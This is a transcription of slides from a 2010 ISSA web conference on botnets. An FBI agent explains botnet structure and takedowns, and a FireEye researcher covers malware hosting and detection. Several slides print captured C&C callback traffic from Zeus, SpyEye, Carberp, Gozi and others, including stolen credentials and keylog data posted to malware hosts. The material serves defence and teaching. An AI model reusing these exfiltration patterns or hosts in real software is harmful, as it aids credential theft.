Botnets. Sponsored by: ISSA Web Conference. October 26, 2010 Start Time: 9 am US Pacific, Noon US Eastern, 5 pm London

Transcription

1 Botnets Sponsored by: ISSA Web Conference October 26, 2010 Start Time: 9 am US Pacific, Noon US Eastern, 5 pm London 1

2 Welcome: Conference Moderator Phillip H Griffin Member - ISSA Educational Advisory Council, Web Conferences Committee 2

3 Agenda How Botnets Have Evolved Chris Calderon - Special Agent, FBI Rooting Out the Bad Actors Alex Lanstein - Systems Consulting Engineer, FireEye Joint Speaker Question & Answer Closing Comments 3

4 UNCLASSIFIED How Botnets Have Evolved presented by Special Agent Chris Calderon FBI UNCLASSIFIED

5 UNCLASSIFIED Agenda What is a botnet? How are botnets created? Why are botnets created? Basic structure of a botnet Taking down a botnet How botnets are evolving Botnets in the news Questions UNCLASSIFIED

6 UNCLASSIFIED What is a botnet? A network of compromised computers (robots/bots) Controlled by a bot master / herder Used to carry out various illegal activities Services are often sold to other criminal elements UNCLASSIFIED

7 UNCLASSIFIED How are botnets created? Setup Obtain reliable infrastructure Develop malware and C&C software Victims Malware loaded onto victim machines Done through exploits and/or social engineering Manage Continually update software / instructions to bots Maintain statistics for the botnet UNCLASSIFIED

8 UNCLASSIFIED Why are botnets created? Spam Distributed Denial of Service (DDoS) Click Fraud Fake Anti-Virus Credential Theft Proxy Service Cyber Warfare UNCLASSIFIED

9 UNCLASSIFIED Basic Structure Bot Master / Herder C&C Server C&C Server Victim Victim Victim UNCLASSIFIED

10 UNCLASSIFIED Taking down a botnet Bot Master / Herder C&C Server C&C Server Victim Victim Victim UNCLASSIFIED

11 UNCLASSIFIED Botnets evolving Bot Master / Herder C&C Server C&C Server Proxy Proxy Proxy Victim Victim Victim Victim UNCLASSIFIED

12 UNCLASSIFIED Botnets evolving Proxy Victim Proxy C&C Server Victim Bot Master / Herder Proxy Victim Proxy C&C Server Proxy Victim UNCLASSIFIED

13 UNCLASSIFIED Botnets in the news ZEUS Steels and logs online banking credentials Primarily targets high balance accounts Money mules used to get money to bad actors Kit now used by many different groups Estimated $70,000,000 stolen from US banks UNCLASSIFIED

14 UNCLASSIFIED Botnets in the news MARIPOSA (BUTTERFLY) Steels online credentials, and also used in DDoS attacks Estimated 12 million infected computers Bad actors traced to Spain and arrested Criminal proceedings ongoing UNCLASSIFIED

15 UNCLASSIFIED Botnets in the news SPAM BOTS Conficker, Cutwail, Waledac,. Up to 10 million bots per botnet Each botnet can send billions of spam s per day Spam used to distribute malware, drive online pharmaceutical sales, fake antivirus software, pay per click advertising,. UNCLASSIFIED

16 UNCLASSIFIED Questions? UNCLASSIFIED

17 Rooting out the Bad Actors or: p2p, fast flux, and other botnet myths Alex Lanstein Senior Security Researcher FireEye, Inc.

18 Today s Agenda 2 Understanding the shift from conventional to modern malware, and the resultant hosting needs A few TT&P to uncover older or moderately sophisticated malware A detailed looked a few bots in the news 18

19 Conventional vs. Modern, APT Malware Conventional Malware Characterized by using spreading techniques, custom C&C transport protocols, IRC communication Examples: Malware/worms such as Conficker, Blaster, Slammer, Mega-D, IRC bots Detectable through a variety of technologies/tactics: NetWitness/Solera, EnVision/Arcsight/Splunk, NIDS Port scanning, high windows port activity, non-http over port 80, non-web traffic, etc. 3 19

20 Conventional vs. Modern Malware Modern-ish malware: Characterized by infecting via browser based exploits Exploit Channel: PDF, Flash, IE/FireFox, QuickTime, C&C Callback over HTTP(s) Malware: ZeuS, Gozi, Koobface, Rustock, Spyeye Partially detectable through manual traffic analysis fairly easily, but a full time resource is needed 4 20

21 World s Top Malware Source: FireEye Malware Intelligence Lab 21 21

22 Modern Malware Infection Lifecycle 1 System gets exploited 2 Drive-by attacks in casual browsing Links in Targeted s Socially engineered binaries Dropper malware installs Compromised Web server, or Web 2.0 site Callback Server First step to establish control Calls back out to criminal servers Found on compromised sites, and Web 2.0, user-created content sites Perimeter Security Signature, rule-based 3 Malicious data theft & longterm control established Other gateway List-based, signatures Uploads data stolen via keyloggers, Trojans, bots, & file grabbers One exploit leads to dozens of infections on same system Criminals have built long-term control mechanisms into system Desktop antivirus Losing the threat arms race 22 22

23 Where is all this malware being hosted? Previously we used to see malware being hosted on infected home machines Web filters responded by blocking access to domains that had multiple A records in residential IP space Now it s being hosted on dedicated servers in proper data centers. Sometimes even with their own RIR registered IP space! 23

24 Root of the Problem There is no Internet Police! Who controls the Internet? ICANN? IANA? CERTs? USCYBERCOM? Tier 1 ISPs? Depends who you ask and how big a stink you make. 24

25 How the Internet is delegated In the name space (think DNS): ICANN Registries Registries == Verisign, Affilias, cctld operators Registries sell to certified gtld and regional registrars Registrars == namecheap.com, godaddy.com, netsol.com Registrars sell to registrants (end user) 25

26 How the Internet is delegated In the IP space: ICANN/IANA (Internet Assigned Numbers Authority) IANA RIRs RIRs == ARIN, LACNIC, AFRINIC, APNIC, RIPE-NCC RIRs LIRs LIRs are generally data centers and ISPs 26

27 27

28 28

29 29

30 ICANN t do anything! ICANN and the RIRs simply sign contracts. They have no regulatory authority whatsoever, presuming that the Registrar doesn t violate the contract. These contracts have no mention of content. Recent success against EstDomains was due to them having a convicted felon as an Officer of the company. Large pushback when someone even suspects they are trying to take an authoritative stance on something. 30

31 31

32 32

33 Big bots in 2010

34 34 Rustock still sticking around POST /index.php?topic= HTTP/1.1 Accept: */* Accept-Language: en-us Referer: Content-Type: application/x-www-form-urlencoded Content-Encoding: gzip UA-CPU: x86 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1) Host: go-thailand-now.com Content-Length: 214 Connection: Keep-Alive Cache-Control: no-cache 18

35 35 Gozi POST /cgi-bin/forms.cgi HTTP/1.0 Content-Type: multipart/form-data; boundary= b9b3139b9b3139b9b3 User-Agent: IE Host: Content-Length: 453 Pragma: no-cache b9b3139b9b3139b9b3 Content-Disposition: form-data; name="upload_file"; filename=" " Content-Type: application/octet-stream URL: FhI &it=1121&sid=6jk1290nr3a3&rid=4611&aid=95&= mousemove b9b3139b9b3139b9b3-- 19

36 36 Zeus POST /xed/gate.php HTTP/1.1 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2;.NET CLR ;.NET CLR ;.NET CLR ; Media Center PC 6.0; HPNTDF) Host: schastlivieiveselierebyta0001.com Content-Length: 329 Connection: Keep-Alive Cache-Control: no-cache a..2.`.ul...t...(...4pp.u.x.!.d.!.+...q.. ' D.0..Y...$...[(...F...c. Ss.Gt'.a....cU./..e(...QB.D.S..N0>.5...I.`:..."...;5..U..t...!...f.=E.<?S..J..J...&.U4...Ju.'9F..E..A.{../.X.cY.}..9..?_...$#>...0Y,....".<. 20

37 37 Tigger Not just financials anymore POST /track_c.cgi HTTP/1.0 Content-Length: 81 icin.wembh.rjr...{.jst]...wsjauqfn.mst^ajs.bj.i_huuy_.j[yq..j.j.....l. SANDBOX_QEZA ;append;20;Microsoft Windows XP Service Pack 3;post_log;16639;force;[[[URL: Title: <untitled> Process: C:\Program Files\Internet Explorer\iexplore.exe User-agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts;.NET CLR ;.NET CLR ;.NET CLR ;.NET CLR ; InfoPath.2;.NET CLR ;.NET CLR )]]] {{{_b=sandbox&_k=mypass55%23&_r=0&timezone=420&timezonefeb=420&timez oneoct=4 20&clientTime=removed&awr=1&isLoginForm=1&awsnf=_5&awsn=_u&awfid=true &aw charset=utf-8&keylog=s}}} 21

38 38 SpyEye ZeuS replacement? GET /web/map/gate.php?guid=users1!ajklpq!ju1232 &ver=10280&stat=online&plg=ftpbc;socks5;t2p&cpu=0&ccrc=jkl AF24&md5=9012ab902413dcf8gga89 HTTP/1.0 User-Agent: Microsoft Internet Explorer Host: hahsdhsl.com Pragma: no-cache GET /maincp/gate.php?guid=user2!nd93103!893cnd1 &ver=10280&stat=online&cpu=0&ccrc=a91024n&md5=3fabd bdbee HTTP/1.0 User-Agent: Microsoft Internet Explorer Host: Pragma: no-cache 22

39 39 Carberp Yet Another Datastealer POST /recv.php HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en- US; rv: ) Gecko/ Firefox/ Accept: text/html Connection: Close Content-Type: application/x-www-form-urlencoded Content-Length: 331 uid=mywitch099abe fga91afd&brw=2&type=1 &data=https%3a%2f%2fwww%2estarwoodhotels%2ecom% 2Fpreferredguest%2Faccount%2Fsign%5Fin%2Ehtml%3F%7 CPOST%3AsuccessPath%3Dhttps%253A%252F%252Fwww %2Estarwoodhotels%2Ecom%252Fpreferredguest%252Finde x%2ehtml%26login%3dalexlanstein%2540gmail%2ec OM%26persist%3Dtrue%26password%3Dmypassword 23

40 40 TDSS Full on SSL 19:11: IP > : tcp *.H.....0E1.0..U...AU1.0...U Some-State1!0...U...Internet Widgits Pty Ltd Z Z0E1.0.U...AU1.0...U Some-State1!0...U...Internet Widgits Pty Ltd

41 Thank you! Alex Lanstein 41 For late-breaking malware research and news: blog.fireeye.com FireEye, Inc. Confidential 41

42 Joint Speaker Question & Answer Chris Calderon Special Agent, FBI Alex Lanstein Systems Consulting Engineer, FireEye 42

43 Closing Remarks Thank you to FireEye for their support of ISSA and this Web Conference Thank you to Citrix for donating this Webcast service 43 Online Meetings Made Easy

44 CPE Credit Within 24 hours of the conclusion of this webcast, you will receive a link to a post Web Conference quiz. After the successful completion of the quiz you will be given an opportunity to PRINT a certificate of attendance to use for the submission of CPE credits. 44